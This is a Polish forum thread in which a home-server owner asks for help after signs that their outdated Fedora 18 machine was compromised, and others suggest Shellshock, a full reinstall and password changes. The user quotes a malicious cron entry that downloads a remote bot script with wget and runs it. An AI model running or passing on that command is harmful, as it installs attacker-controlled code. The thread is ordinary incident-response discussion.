Skocz do zawartości

Czy To Oznacza Włamanie Na Serwer


lukbok

Rekomendowane odpowiedzi

Witam serdecznie.

Ze względu na to, że moja widza jest niewystarczająca proszę Was o pomoc w zdiagnozowaniu "włamania":

System to fedora 18. Pracuje jako router, serwer www, imap, pop itd.

Co wzbudziło moja podejrzenia:

1. bardzo duże obciążenie generowane przez proces /user/local/nagi
dodam, że nie mam takiego katalogu. Po rozszerzeniu opisu ps -A -f otrzymałem: /usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg W systemie nie ma nagiosa, a tym bardziej folderu oraz pliku nrpe.cfg

2. był uruchomiony proces "b", a w pliku /etc/rc.d/rc.local był dodany (nie przeze mnie) wpis "/root/b"
w katalogu /root/ nie ma pliku b

3. zauważyłem że adres bramki w "route" jest inny niż ten który dostałem od prowidera (z sieci dialog) i w ogóle się nie pokrywa z adresem zewnętrznym IP.

w logach nie ma nic podejrzanego, a w secure.log są tylko moje logowania.

Po wykasowaniu wpisu w rc.local oraz resecie serwera procesy b oraz nagiosa znikają ale po kilku tygodniach znowu się pojawiają.




Witam ponownie

w cronie znalazłem jeszcze takie wpisy:
1. root Nie wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh >
2. unbound Nie /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -c /etc/unbound/icannbundl ...
narazie je wyłączyłem.

Odnośnik do komentarza
Udostępnij na innych stronach

Nie pisz postów pod własnymi i do tego cytując własny poprzedni wpis. Przyznasz, że to trochę bez sensu?

kody, polecenia itp jak np. wyżej przedstawione "wget" czy "unbound-anchor" wstawiaj między znaczniki 'code'.

 

Nie wiem jak u innych, ale u mnie obrazki (bo to chyba są obrazki?) nie wyświetlają się.

 

Co do tematu, to zacząłbym od wyjaśnienia przypadku, który opisałeś w innym wątku dot. crontaba.

 

Poza tyym tu jest trochę do poczytania: http://de.comp.security.misc.narkive.com/v6Wecfis/shellshock.2

Nie znam niemieckiego, ale strona przetłumaczona w google-chrome daje jakie takie pojęcie o problemie. Z grubsza - o ile dobrze to rozumiem, bo czytałem pobieznie - to ktoś mógł próbować wykorzystać lub wykorzystał dziurę w bash.

Nie wiem czy w F18 ta dziura została załatana. Takie są m.in. problemy, gdy nie korzysta się z nowszych wersji systemów tylko pozostaje na niewspieranym systemie.

Jeśli ten sprzęt służy jako serwer, to lepiej by było zainstalować CentOS. Lepszy na serwer a przede wszystkim cykle wsparcia znacznie dłuższe niż w Fedorze.

http://wiki.centos.org/FAQ/General#head-fe8a0be91ee3e7dea812e8694491e1dde5b75e6d

Odnośnik do komentarza
Udostępnij na innych stronach

F18 już dawno nie jest wspierana, a w międzyczasie było kilka groźnych luk heartbleed/shellshock. W twoim przypadku prawdopodobnie wykorzystano shellshock szczególnie, że korzystasz z webmina.

Jedyną prawidłową reakcją na taki incydent jest postawienie całego systemu od nowa w aktualnej wspieranej wersji oraz oczywiście zaktualizownie go. Sądząc po uruchomionych programach, proponuje zmianę haseł do wszystkich usług, do których logowałeś się z tego komputera (poczta, ssh, konta bankowe itd)

Obrazki nie wyświetają się bo link kieruje na adres prywatny 192.168.5.1, sądząc po numerze portu jest to webmin autora wątku.

Odnośnik do komentarza
Udostępnij na innych stronach

Witam,

 

Przepraszam Was za ten chaos w mojej wypowiedzi ale jestem troszkę poddenerwowany całą tą sytuacją.

 

Nie chciałem wklejać linków (obrazków), a jedynie tekst (własnie to poprawiłem).

 

Szkoda, że polecacie postawienie serwer na nowo. Zajmie mi to chyba z tydzień i jakoś chcę tego uniknąć

 

Dziękuję za informacje

Odnośnik do komentarza
Udostępnij na innych stronach

Szkoda, że polecacie postawienie serwer na nowo. Zajmie mi to chyba z tydzień i jakoś chcę tego uniknąć

Jeśli ktoś Ci się włamał, to warto zrobić backup całości, żeby później poszukać co się stało, ale system do przeinstalowania, bo tak naprawdę nigdy nie będziesz do końca wiedział co i gdzie Ci się zainstalowało.

Lepiej stracić tydzień niż potem uprawiać fekaloplastykę tygodniami.

Odnośnik do komentarza
Udostępnij na innych stronach

Może będę wredny i chamski, ale muszę zadać to pytanie: co z Ciebie za admin? System został skompromitowany i trzeba być skrajnie nieodpowiedzialnym, żeby go ratować zamiast usunąć i postawić na nowo. Skąd wiesz jaki był wektor ataku? Wejście może być znane jak powiedział kolega @sunrise mógł być to shellshock, ale teraz na tym systemie masz z dużym prawdopodobieństwem powykradane dane, hashe, bazy, pocztę, emaile, prywatne pliki. Jednak najważniejsza jest możliwość, że jakiś rusek albo  skośnoki, mógł w tym starym, niewspieranym systemie(!!) zainstalować rootkita w postaci modułu kernela, który jest niewidzialny i niewykrywalny. I ciągle może wysyłać wrażliwe dane, nawet gdy będzie ci się wydawać, że "już wszystko naprawiłem bo załatałem shellsocka".

Jeżeli jest to ważny serwer i trzymałeś tam dane osób trzecich to masz nawet OBOWIĄZEK zgłoszenia takiego faktu na policję i ustalenia co zostało wykradzione.

Tyle odemnie, ale admin to z ciebie widzę niezły.

 

EDIT:

Aha i oczywiście pewnie backupy posiadasz i postawienie systemu zajmie ci 1h z updatem do F20?

  • Upvote 1
Odnośnik do komentarza
Udostępnij na innych stronach

Ok. Już się na mnie wyżyliście. Po części macie rację.

To jest taki domowy (dla członków rodziny) serwer: plików, poczty (obsługa kilku domen), www. Postawiłem go kilka lat temu (jak jeszcze bardziej siedziałem w linuxie) i zapomiałem o problemie. To było raczej takie hobby.

Nie mam siły stawiać tego na nowo dlatego wykupiłem hosting i przeniosłem pocztę. Jako serwer plików kupię jakiś NAS i dam dyski w macierzy.

 

 

Dziękuję i pozdrawiam

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
×
×
  • Dodaj nową pozycję...